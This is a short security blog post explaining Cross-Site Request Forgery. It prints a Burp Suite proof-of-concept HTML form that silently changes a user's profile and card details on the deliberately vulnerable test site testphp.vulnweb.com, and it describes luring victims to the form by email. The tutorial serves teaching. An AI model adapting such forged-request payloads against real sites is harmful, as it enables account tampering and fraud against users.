Cross Site Request Forgery (CSRF)

Riya Jain
2 min readAug 30, 2023

Cross-Site Request Forgery (CSRF) attacks allow an attacker to forge and submit requests as a logged-in user to a web application. CSRF exploits the fact that HTML elements send ambient credentials (like cookies) with requests, even cross-origin.

Like XSS, to launch a CSRF attack the attacker has to convince the victim to either click on or navigate to a link. Unlike XSS, CSRF only allows an attacker to make requests to the victim’s origin and does not give the attacker code execution within that origin. This does not mean CSRF attacks are any less important to defend against. As we’ll see in the examples, CSRF can be as dangerous as XSS.

There are two main parts to execute a Cross-Site Request Forgery (CSRF) attack:

1) The first part is to trick the victim into clicking a link or loading up a page. This is normally done through social engineering. By using social engineering methods attacker will lure the user to click the link.

2)The second part is to send a “forged” or made up request to the victim’s browser. This link will send a legitimate-looking request to the web application. The request will be sent with the values that the attacker wants. Apart from them, this request will include any cookies that the victim has associated with that website.

Let’s understand using an example

So currently I am on a vulnerable website which is: http://testphp.vulnweb.com

The POC looks like this:

<html>

<! — CSRF PoC — generated by Burp Suite Professional →

<body>

<script>history.pushState(‘’, ‘’, ‘/’)</script>

<form action=”http://testphp.vulnweb.com/userinfo.php" method=”POST”>

<input type=”hidden” name=”urname” value=”John&#32;Smith” />

<input type=”hidden” name=”ucc” value=”1234&#45;5678&#45;2300&#45;9000" />

<input type=”hidden” name=”uemail” value=”email&#64;email&#46;com” />

<input type=”hidden” name=”uphone” value=”2323345" />

<input type=”hidden” name=”uaddress” value=”21&#32;street” />

<input type=”hidden” name=”update” value=”update” />

<input type=”submit” value=”Submit request” />

</form>

</body>

</html>

He then updates the POC with the details he wants to change and sends it to the victim using

social engineering techniques like sending link via email.

CSRF vulnerability was exploited!

--

--

Riya Jain

Security Researcher | Penetration Tester | Red Team | Blue Team | eJPT|CAP | CND | Purple Team